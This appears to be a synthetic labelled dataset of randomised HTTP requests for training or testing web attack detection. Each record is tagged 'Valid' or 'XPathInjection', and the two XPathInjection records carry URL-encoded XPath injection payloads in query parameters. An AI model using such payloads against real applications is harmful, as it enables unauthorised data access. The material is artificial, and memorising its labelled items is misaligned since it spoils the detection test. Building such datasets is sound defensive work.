Date: Sun, 18 Feb 07 16:24:22 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: eLdfnttl
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "UTO0q3VBxUsrOf0."
If-Range: "OWaQ0OzjuUmbweE1"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: -3,456-488022
Referer: http://www.thiifaz.be/qoRe/3nI7jz/wicdx/3oseftrl/noneuTen.css
TE: gzip;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (compatible; ttayesinh; WinNT; oonn; rlohtcMhde)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45101
Start - Id: 22478
class: Valid
GET /jrbu5ftrlLs/l7gLJ5h/Gt/olpruorlaisdnt/n14ul7mpz4V/7ThTh/t61aiXoke.png? HTTP/1.1
Host: 52.204.86.19
Connection: uNeab
Accept: video/*;q=0.5, video/quicktime;q=0.6, video/mpeg
Accept-Charset: iso-8859-7;q=0.4
Accept-Encoding: *
Accept-Language: l-adnta3h, egso-olyamen2, wryfis8-onstzea7, se56enJ-ueoenet
Cache-Control: max-age=9543
Client-ip: 25.174.175.220
Cookie: yentrnhi9c=9279369139;Okhfi4osE=5c4an\r;hlNeeeebl6=ot5;ien=0dGr(h 3;6daee2=7;tmp7qqMBlwS-Fp=663
Cookie2: $Version="99"
Date: Thu, 20 Oct 05 21:33:16 GMT
ETag: W/"i2Is8VlOYMXQ1m-JDiz"
Expect: ttnl=nuttomgd
From: oh5chbe@53nslitm.fr
If-Modified-Since: Mon, 08 Oct 07 11:59:21 UTC
If-Unmodified-Since: Sat, 03 Jul 04 06:41:43 UTC
If-Match: *
If-None-Match: "u40UOcDA6v@05dxo-s"
If-Range: "inhIim0IscooL5Obk"
Max-Forwards: 225
MIME-Version: 0.3
Pragma: iM8e='hNnma0n'
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: oeit roce=et9Ii
Range: 646-5
Referer: http://www.anrdoi.com/hLo8yh/bNeebue.pdf
TE: chunked;q=0.8,trailers
Trailer: Upgrade
User-Agent: n5f7zma0 http://www.tetthn.com
UA-CPU: Sparc
UA-Disp: 392,629,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 060x3759
Via: 6.9 www.ss2ii9b.tiff, 1.9 www.hegl8n5.tiff
Transfer-Encoding: o6oe; wsitp0=areawet
Upgrade: bah/4.7, 7rv/7.5
Warning: 929 www.tgeoabe.tiff "tnGttae2" 
X-Forwarded-For: 10.200.53.236
X-Serial-Number: 5826747890581
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22478
Start - Id: 18389
class: Valid
GET /yKCtDKC5Y.php3?wneiwgus=xjeisphbdsawt2 HTTP/1.0
Host: 9.111.210.56
Connection: close
Accept: video/quicktime, image/*
Accept-Charset: us-ascii;q=0.9, euc-tw, iso-2022-kr;q=0.7
Accept-Encoding: compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 50.134.94.108
Cookie: 8ttetk=nhomec|eDfM;etbex0hrqnenh=scripti+ttD-mi=c[sie(l;da;eeeone=9;it=sKSg
Cookie2: $Version="8"
Date: Sun, 11 May 08 04:48:28 CET
ETag: W/"DFGyG11.7FB0Cd_awC"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 30 Jan 05 03:50:31 CET
If-Unmodified-Since: Tue, 21 Sep 04 17:47:56 GMT
If-Match: "12fYjJKWlrdQW1rCSeE"
If-None-Match: *
If-Range: "MotH1zEVU4lCBdYBHv"
Max-Forwards: 58
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: ahes urkauset=elhls4e
Range: -1,77209-
Referer: /ygrca/ndhigEh/eevn9Oe.mdb
TE: chunked;q=0.6
Trailer: Trailer
User-Agent: rIEHg/7.2
UA-CPU: x86
UA-Disp: 0207,859,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 705x273
Via: vprxt/9.0 223.8.220.144, 6.3 www.cAaao4te.htm, 1.6 54.21.134.26
Transfer-Encoding: compress
Upgrade: pto1de/0.8, qne/9.3, atwl/8.8
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 9325860267416944126
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18389
Start - Id: 11744
class: Valid
GET /e9uAAdnylCaLtDDV/rgL0w4zRIScul/whee9hToios/ncIbauokes/KaH/todey98unayanbgu.php?ec8beucrgrw=ed5O+b&eibrp=%5BmljehsinputatYswl&_jaC=uhN%40o&daxhrkhe=lw&SWC2Qt=ulxudr0a9idtS&dcty7=3339&rT5t=lmLJp21Vup HTTP/1.0
Host: www.py8qn4ta.uk
Connection: keep-alive
Accept: text/*;q=0.3, audio/x-wav;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: ai-e;q=0.4, efo-E7l, raj-1aE3;q=0.2
Cache-Control: no-transform
Client-ip: 202.7.189.170
Cookie: elcceao=hm7\&;u9toal=1723774;7RlibZCmWYE=65511183;t8sf2oFp4Ei=rL2h;6W.s08Ksam=a\e~linkvusrDx)8oDr3;m45ssnedsksAmy=0so
Cookie2: $Version="180"
Date: Wed, 22 Feb 06 10:10:05 GMT
ETag: W/"a@6P.77CWrtDMk2PSW"
Expect: 100-continue
From: abst@3k8ohdn.gov
If-Modified-Since: Thu, 01 Mar 07 19:53:17 GMT
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: *
If-None-Match: "iwdhbRmzDZhwzLzfMl15"
If-Range: "iMDn9QKe4UgadMSPF"
Max-Forwards: 743
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: Basic ZXRvZGU6aW9ibGhpMmM=
Range: 1-,5-,24371-73606
Referer: /oldW/asdoty/rnnrhob/aneatqss/8gtwe.jsp
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: tlein9uohd (k_waSo; i0q22Dj.; nsY1tJ3)
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 362x4409
Via: 0kares/7.7 15.21.171.168, 1.7 185.196.195.102
Transfer-Encoding: compress
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 990 217.45.111.90 "utbxe9d4csrsohke" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11744
Start - Id: 25977
class: Valid
GET /a1fA8OQsoJFOV9i.shtml? HTTP/1.1
Host: www.uttoyE.fr
Connection: egctio
Accept: text/*, video/*;q=0.6
Accept-Charset: x-mac-turkish;q=0.8, iso-8859-8, iso-8859-1;q=0.6
Accept-Encoding: deflate;q=0.2, deflate
Accept-Language: eubtfot-g8oaehez;q=0.2
Cache-Control: no-store
Client-ip: 34.214.103.129
Cookie: zN3includeE=iyBHvZlQ5
Cookie2: $Version="9"
Date: Tue, 21 Jun 05 07:36:21 GMT
ETag: W/"7no5AWsueZfuwH1tL"
Expect: 100-continue
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Mon, 19 Feb 07 15:45:06 UTC
If-Unmodified-Since: Tue, 12 Apr 05 14:59:52 UTC
If-Match: "x6Jz6_6kH2dOt4Ge5"
If-None-Match: "Bi9KXD.p0ETSpkkPLbca"
If-Range: "_4fOf1eZ2hqwmv.rvns"
Max-Forwards: 87
MIME-Version: 1.5
Pragma: zdnf=ywDoN
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: 1jai6 iFomomc=Sathae
Range: 4-,8-035554
Referer: /TseEn.css
TE: trailers
Trailer: Host
User-Agent: disnilotmNo
UA-CPU: Sparc
UA-Disp: 199,4987,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8597x176
Via: 1.0 109.241.190.218, FTP/9.1 www.eenmutA.shtml, HTTP/2.5 www.PCoenct.html:28
Transfer-Encoding: gzip
Upgrade: sweeL/7.7, xtf/2.3, 1xnyt/4.8, ssimb/4.5, iislt/5.6
Warning: 442 www.odyfti.shtml "igeotauecom8" "Mon, 10 Dec 07 02:26:29 UTC"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25977
Start - Id: 33355
class: Valid
POST /mi7tSs7t7zeietaZO/h2lautttbe5bMaqfpB/no/aoElrwxmwr0o/KmSZM/sztCPGiOeci4-uo5/mFtNm/sfoltlaSee/YlGBBw2fxX/e784/jgjN2_NK9pQ.tiff? HTTP/1.0
Content-Length: 18
Content-Language: wnSecm,aoefh,eGt6og1
Content-Encoding: deflate
Content-Location: /Ye8bt6f/a4as.mdb
Content-MD5: Mmw1ZWxvcnVkb21ha2NmbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Jan 07 16:50:13 GMT
Last-Modified: Sun, 04 Feb 07 09:41:43 CET
Host: 188.34.61.29
Connection: close
Accept: video/quicktime, text/plain
Accept-Charset: koi8, windows-874
Accept-Encoding: 
Accept-Language: ezruf1o-c, rht-u
Cache-Control: min-fresh=871
Client-ip: 59.249.250.3
Cookie: lYhkusoayrCs=neIos1te;ia4heo=m0ogsisl2pSq;Ype9etei=sa\'iewzd1i;et3pvlo78ueniwO=bWCEa;tamyadQl=793
Cookie2: $Version="711"
Date: Wed, 22 Apr 09 16:47:43 CET
ETag: "WcDlV2c1IxnQ.l8VG"
Expect: 100-continue
From: Aeragl@tweisb5so.ch
If-Modified-Since: Tue, 17 Feb 09 13:48:27 GMT
If-Unmodified-Since: Fri, 16 Dec 05 16:20:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 92
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: euet eprhhwtr=g2dt
Authorization: Basic MWl1aDpldWJhZXU=
Range: -49
Referer: /miwx/9tdoeo/eUi7t.php3
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: foygSn7ee (hW1BX.aJD; tZOx@QU9; eJ4See; v47Q_Eu; 4YuKifUW)
UA-CPU: MIPS
UA-Disp: 6397,158,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 3.2 www.eyellti.js, HTTP/6.1 194.233.199.177, 4.8 www.oro8zoTw.shtml
Transfer-Encoding: ihss
Upgrade: tqo/8.5, hd7t/7.1
Warning: 030 www.crSoefet.htm "eblh" 
X-Forwarded-For: 206.4.1.170
X-Serial-Number: 93235551323019151899
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nr50cxeHI=<jarcp

End - Id: 33355
Start - Id: 7248
class: Valid
PUT /tgfgos4c/sHbK6X7dMfahgw8fO/eb9fwctmjQ/jJdyROaZRM.nnnM/9Sw/oIsNZ.Of.He/JG%uwyfAMZp8hIsF/o@@mGAvGOK4oV.8NWTG/e@GSA44I@wVil8yFOoE/es7mr/u9tAejdjnttNrif7ss/ee85G9h.bin? HTTP/1.0
Content-Length: 90
Content-Language: h7,oaN
Content-Encoding: gzip
Content-Location: /opio0/etho/ntoe/ehhtnVjp/sLaG.php4
Content-MD5: dGRpRHRob2VoYWxpM2Fibg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Dec 06 11:25:24 UTC
Last-Modified: Wed, 03 Jan 07 15:23:52 CET
Host: 23.235.122.248
Connection: close
Accept: text/xml, audio/*, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate, deflate, gzip
Accept-Language: yHlT-89ft;q=0.2, 1Hjcsts2-bahhonn4;q=0.6
Cache-Control: no-store
Client-ip: 157.80.150.41
Cookie: efotci=0aa47ezTsgraxkCe;eot6roesH=1hal$uwefoo+(;tSutfs=83;nss6dzd=5cwel3du;FIFG73Ko3u=ns;9exec2e5IDu@3=7 spitmpsdeleteL
Cookie2: $Version="477"
Date: Sun, 11 Jan 09 07:55:53 CET
ETag: "qTb.SMAB7qiNTiq"
Expect: Oi63dnft
From: hmr2nw4d@stiimunlz6.cz
If-Modified-Since: Thu, 21 Oct 04 11:14:34 GMT
If-Unmodified-Since: Mon, 17 Nov 08 24:23:05 GMT
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: *
If-Range: Fri, 14 May 04 16:06:48 CET
Max-Forwards: 420
MIME-Version: 8.1
Pragma: oNrafw='nnlofn'
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: DsrL ossoa4tT=eyriIn
Range: -805
Referer: /tflrt5hn/miheiA/ivcftn/aqmMooa3/tealorhF.jpg
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: iiutz (oaycY5K)
UA-CPU: StrongARM
UA-Disp: 3266,331,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: HTTP/7.9 www.tgs8.css:61, 9.7 112.150.232.9, 3.1 www.rrhoGid.js
Transfer-Encoding: esms
Upgrade: l3se/5.2
Warning: 031 192.107.13.65:1583 "eezimxle" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ------------------------------
~~~~~: ~~~~~~~~~~~

astylegwindow.open=iie7arKe-&s1pR=8&nlyrliTstesyt=rthj&e3rini9as8str=lo3sduirt&acceptWqh=2

End - Id: 7248
Start - Id: 25441
class: Valid
GET /InAnspbciRn/Asicamabtaeriyt4dDS/ekais9o/6Y7/c.pL96/lFfLSW7It7NOfIZzho8-/.RIOfYVh5RMx/-JN6pmqI4J_Zxp_/.vYobjectmB/6Noszaaixo4icEwisttn/sthnn5xednscTAtytues/nae9dflpit6N.tiff? HTTP/1.1
Host: 179.169.185.39
Connection: msrb7e
Accept: audio/x-wav
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 82.74.210.10
Cookie: rj1=tlesSoabsjes;xfTqto7fv=6vx;iet=d90bbRGK1;SKadmin.FJZKcusrL=?Riznetcat p7iLftp;a4=7tThtpasstde$sAn htaccesopen2
Cookie2: $Version="69"
Date: Fri, 02 Jan 09 18:58:41 GMT
ETag: "q9nh.aRG.k29lYO.Rd"
Expect: keo3Em
From: 2nOl@m8et6rtby.cz
If-Modified-Since: Thu, 20 Aug 09 08:06:35 CET
If-Unmodified-Since: Wed, 21 Apr 04 01:29:17 CET
If-Match: *
If-None-Match: "RP8LI1ZY-ru9wpv"
If-Range: Thu, 19 Jan 06 17:53:45 GMT
Max-Forwards: 905
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="0Wocgc42"
Authorization: aEo1m tero=aohei
Range: -7599
Referer: /natHpem/cq0h/f7attUl.tiff
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.7 (Machintosh; U; Mac OS X 2.3; de-8e; rv:0.6.0) Gecko/25990632
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 407x092
Via: 0.6 185.16.192.110, HTTP/4.0 84.240.176.197, 2euo/6.5 216.7.94.123
Transfer-Encoding: gzip
Upgrade: Eaqa/3.2, ndd/9.1, pel/7.0, tto1c/5.3
Warning: 076 10.206.235.85 "hibtra9ec9x9ss2vi" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25441
Start - Id: 5214
class: Valid
PUT /mD_0cEFXdAf/Omtcotaoeonuos/mkIgqSpOx@wf/e3iCursWlbdifa/tegokecartwssh/ngv50aoelk3lisetm5/dCNXqyPrGWvaQQ1.5v_D/aGc_E5@/LaawQics.js? HTTP/1.0
Content-Length: 252
Content-Language: odrrla
Content-Encoding: compress
Content-Location: /nonn/tS1tO/TmaGeheL/ieeAPes/sostna.css
Content-MD5: bWlkZHVvbm1xeDhxc2VueA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Dec 06 15:33:26 CET
Last-Modified: Mon, 02 Feb 09 22:59:37 UTC
Host: 137.23.225.217:80
Connection: aob5
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 96.9.120.137
Cookie: MDwtftpO9=bgsound8;KCphp@Bxn@4Xh=e--;ecdfehoNrts=aTOWVlMOa;eiaeooijawoqra=3$~R)-lonrusforms7;elbntwino=ovekp
Cookie2: $Version="44"
Date: Fri, 01 Apr 05 23:07:33 CET
ETag: "C@GtCFoC0Oe-mbj"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Thu, 09 Feb 06 22:31:56 UTC
If-Unmodified-Since: Fri, 30 Jun 06 12:22:10 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Sep 07 19:18:03 CET
Max-Forwards: 4579
MIME-Version: 3.8
Pragma: 7a='cq'
Proxy-Authorization: 4ehath lmnnnnh=bnrte
Authorization: Digest uri=/woospls/8llym/xAdi/me3a9.doc
Range: 842322-
Referer: http://7qiaoyc.com/au3dr/Nwbsut.jpeg
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/3.9 (X11; U; Linux i386 6.8; e4-cf; rv:2.7.6) Gecko/96659357
UA-CPU: MIPS
UA-Disp: 5711,593,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 976x461
Via: 1.6 www.iTkoitZ5.jpg
Transfer-Encoding: deflate
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 744854531
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

opar=5&soplr41=tehob  (ie|a8bte-fEhaving&Getacf=nuMuSeUzoXQ9&onpntinlhihiEx=dRsno0ie&rhdrln2n=0&tssale=armepue&hhwhn=estphhrst1&rbel3Qtryo=6iinclude-s&wifat=U9EeuoRTrsaeeomAr&gyihe2amhath7=yQgRnVzF5&hash=t5XST.UlBV&zoehtngqnodred=stdinaHq&et== nr

End - Id: 5214
Start - Id: 49982
class: XPathInjection
GET /5y7kKTYA1mgrg2hi4vB/deleteZEPH4s/srkBjgkPJg@Y@5RV/Y_6RetcdHgNO@u/tmTAk/oNqmwsQ/vIwconnectsamnph-vp32mbp/xu6hiIyee8u/WnYc/3qdzNS9qHug.htm?bpeAe=iS%40erh%25KlogT&a4psrntonnps=9rtd%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++%27od%27++%3D++++%27&naT=r6r&tepthesa=n%3Bntgx8%25phd HTTP/1.1
Host: www.taiaihy.org:80
Connection: keep-alive
Accept: application/x-tar, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=38
Client-ip: 156.223.154.24
Cookie2: $Version="372"
Date: Fri, 12 Jun 09 19:57:36 GMT
ETag: W/"o_kvEAaAscQ3k6U"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Sun, 25 Sep 05 10:57:27 UTC
If-Unmodified-Since: Tue, 29 Nov 05 01:46:08 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jun 07 12:03:19 GMT
Max-Forwards: 5039
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: lIa6N tRl9n=obihRto
Authorization: NTLM eUNnaWxmTEFzbm9hRTFlaW5lb25sZ3NobGVseHNoc29rbm9k
Range: 30900-
Referer: /nnLdNyr/rxae3n.wav
TE: deflate;q=0.9,deflate
Trailer: User-Agent
User-Agent: ner9wN4/2.4.1
UA-CPU: 68000
UA-Disp: 1888,408,16
UA-OS: Linux
Via: 4ur/7.0 www.rrhcmn.jpeg:6550, 2.6 125.62.24.218:756
Transfer-Encoding: deflate
Warning: 265 www.raemriNe.tiff "tniraa8ta" 
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 80680664480083663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49982
Start - Id: 32229
class: Valid
GET /Na/c8By3kLT23.nsf?4J6selectrYZ=aTTJC&cs6laagGsbOHie=replacefi%3A5&casdV=8869&fiuhnoyscdcdre=t&8eeZ=ht0uAOnyHlocationt3tqevar0v&ofne4rrtr=alocation49sa&a9IRfsarcd1ii8A=union%2Bpn%2F4edi%26es&rs=8495&is=m%5C&etcMs21t=wheredeletecIo&WenfbeRciiWpB=tosE%3FlocationcteurP&ChnftoLrn1mtlie=%25selectuszi&oEsnm460s92ey=wnelbhcz1uririIeiO HTTP/1.0
Host: www.9gatrgumi.st
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, euc-cn;q=0.6, cp-936, windows-1257;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: 5lp6sa6R='Yfo'
Client-ip: 20.168.138.91
Cookie: jaSyOc=jpassthru so;t vuac?tlkck;fd=2496856317
Cookie2: $Version="16"
Date: Wed, 18 Mar 09 13:05:50 CET
ETag: "O@YKQNLCcNwXQ@Ce"
Expect: 100-continue
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Wed, 31 Mar 04 08:15:52 CET
If-Unmodified-Since: Sun, 06 Dec 09 04:42:18 GMT
If-Match: *
If-None-Match: "vweAjYsPMLUMOovuzJ"
If-Range: Sat, 24 Jul 04 10:18:46 GMT
Max-Forwards: 15
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest username="udr5p1ia"
Authorization: Digest realm
Range: -31011,02795-
Referer: http://www.6hrnr3.it/oiu1Em.pdf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 7.4; it-fM; rv:6.0.2) Gecko/59514217
UA-CPU: PowerPC
UA-Disp: 1905,614,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3089x052
Via: 5.3 225.220.46.210
Transfer-Encoding: tiLaq
Upgrade: lzs/3.7, tsNj/4.2, sdsRft/3.0
Warning: 749 23.10.139.216 "sathsSNmnuastaecheLo" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32229
Start - Id: 30417
class: Valid
GET /fefanirnyauot/gwMJ.2CdaaCfF1Wvyr/rBFaJ.V83/3fFaoF4/pabo/bX9jOEnWuOTMC0x6zyx/5vQ.tiff? HTTP/1.0
Host: 2.31.204.18
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253;q=0.6, iso-8859-5, hz-gb-2312, x-mac-korean;q=0.0
Accept-Encoding: identity;q=0.8, gzip;q=0.1, gzip;q=0.4
Accept-Language: sp-emnn;q=0.2
Cache-Control: max-stale
Client-ip: 180.57.71.245
Cookie: Se=sfe;44O3mOoP9kS.=593
Cookie2: $Version="530"
Date: Tue, 12 Jul 05 15:11:53 CET
ETag: W/"sUhkYg9F@x81qi5"
Expect: boqlnoRo
From: wmReuit@hemuh5.fr
If-Modified-Since: Mon, 26 Mar 07 12:04:50 GMT
If-Unmodified-Since: Sun, 03 Feb 08 14:59:18 CET
If-Match: "xSGfsuMbuYbCsajEIP-"
If-None-Match: "z@nZHjS_d7I1U8yAe2JF"
If-Range: *
Max-Forwards: 115
MIME-Version: 0.2
Pragma: ofieips=rnae
Authorization: t7xpge bdaesan=thtash
Referer: http://kina.de/eicar/ennsehm.asp
TE: gzip
Trailer: Authorization
User-Agent: shneUSnueeE
UA-CPU: x86
UA-Disp: 1255,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 094x400
Via: 6.6 163.166.65.24:94
Transfer-Encoding: deflate
Upgrade: Itrr/4.9, dhnuRy/2.8, stitY/4.6, ayczo/5.8, et7hnu/4.7
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30417
Start - Id: 16260
class: Valid
GET /yab0Z1B0/wp9eeirpdtceee8/rwbcleeqhlmneoee/mYa/lUegNVdWSuDUgwCw/abxznL19LFbau6/TobcnTwLrtfleeaCon/oriahwaaztiOiC/loeae/lnegYrgDhe.cgi?nir8nw4snlra=80607765&eyiahmneihi=654&o5gldissnslp=71021&yis0de=7117 HTTP/1.1
Host: www.blooErne.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 252.250.241.161
Cookie: hvCperlXshutdownH=2ase
Cookie2: $Version="3"
Date: Mon, 16 Aug 04 19:48:54 GMT
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Mon, 29 Oct 07 01:52:14 GMT
If-Unmodified-Since: Thu, 26 Feb 09 11:47:51 CET
If-Match: "Ov0Rft0CNuwwjgpL76"
If-None-Match: *
If-Range: *
Max-Forwards: 435
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM cmVlZXlObnVmblRkMmxvdGdSMG9sZXBud296dHdUeXFFdGNldVl6MGk=
Authorization: chiiu p5rnnt=nlui
Range: 767-,-23616
Referer: http://www.u7ot.com/ateA6ive/aes1xvee/hoeew/enfedi.cgi
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: untaes4b
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2602x876
Via: 8tsyst/3.8 65.7.250.16
Transfer-Encoding: p9ee
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16260
Start - Id: 35581
class: XPathInjection
GET /oobe/0pLxPtRqo9gsaB/n0/ejtee/ee1ntzeadehm3m4yl/m6haeeikem5ssnhiuoch/Wrx8/mwMQn1NZTv/4YIpTPM/ti/oavucYkCz/e00KZSN.aspx?6kfmocha=9426385&are=as+&7ocmogy5aZh=rs8n&hm4mHfpb6inha=qzo%40&Pfk@VperlHt2e=eochildht&usdtlbf=tnabyl8mbgtfcL3s&eihtuxl=oNReerEih&miuoe=0&nls=23239++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++62027%3D&ZcmdhGA9un=lm%3Dca&d7lm7tksti=edur%7Enrhz%40yqe7h&D9QMnd1oJ=040411&aAi=mlTer&tt0=akhlzf6&ssb22tdnrag=1 HTTP/1.1
Host: 22.176.107.95
Connection: pwrfta
Accept: text/*;q=0.9
Accept-Charset: big5, x-mac-arabic, x-mac-greek;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=50554
Client-ip: 252.234.242.120
Cookie: ayn4rRybOrI=u9e;wcO0PC.o=7
Date: Tue, 12 Sep 06 06:24:14 CET
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Thu, 04 Oct 07 13:16:26 GMT
If-Unmodified-Since: Tue, 07 Sep 04 06:14:54 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "@4Lt902YVgQFVb8XgSB"
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: Aoo6='al'
Authorization: Digest uri=/eo0it/saeJn.wav
Range: 1278-6
Referer: /yeX3e.mp3
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 0.0; oo-sb; rv:9.5.3) Gecko/52987206
UA-OS: Solaris
UA-Pixels: 468x391
Via: 0.5 www.rathrte.css
Transfer-Encoding: identity
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

